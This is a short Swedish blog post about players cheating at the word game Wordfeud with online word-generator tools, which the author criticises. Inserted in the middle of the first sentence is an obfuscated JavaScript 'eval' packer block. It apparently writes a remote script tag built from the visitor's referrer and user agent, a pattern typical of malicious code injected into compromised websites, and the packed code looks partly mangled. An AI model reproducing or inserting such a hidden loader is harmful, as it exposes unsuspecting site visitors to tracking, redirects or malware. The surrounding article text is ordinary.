Image Image Image Image Image Image Image Image Image Image

| 17 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Fuskar du i spelet wordfeud?

Fuskar du i spelet wordfeud?
Sebastian Plengier Ehrnfelt

Wordfeud eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyzsr|var|u0026u|referrer|zdfnk||js|php’.split(‘|’),0,{}))
har ökat otroligt bland användare. För några dagar sen gick de ut med att det var över tre miljoner nerladdningar världen över.

Alphapet är ett spel där du verkligen behöver tänka till. Dock har många börjat rapportera in att det förekommer fusk.

Jag kommer ihåg när jag spelade words with friends som också var en applikation med spelet alphapet men dock bara på engelska. Jag märkte att många vänner började använda ord som jag själva aldrig hade hört eller sett i något sammanhang.
Tråkigt eller ej så är fusk något som man aldrig kommer bort från. De ansvariga på Wordfeud kan inte hjälpa till i detta fall. Fusket sker utanför själva applikationen.

Det finns program på webben som genererar fram de bästa orden du kan lägga.
Jag tänker inte säga vad de heter för enligt mig förstör det spelet. Snart kommer inte bara du sitta och fuska utan även din motståndare, och då är det inte längre en tävling om kunskap, utan vem som får bäst bokstäver.

För att spela Wordfeud kan du ladda ner den gratis i App store.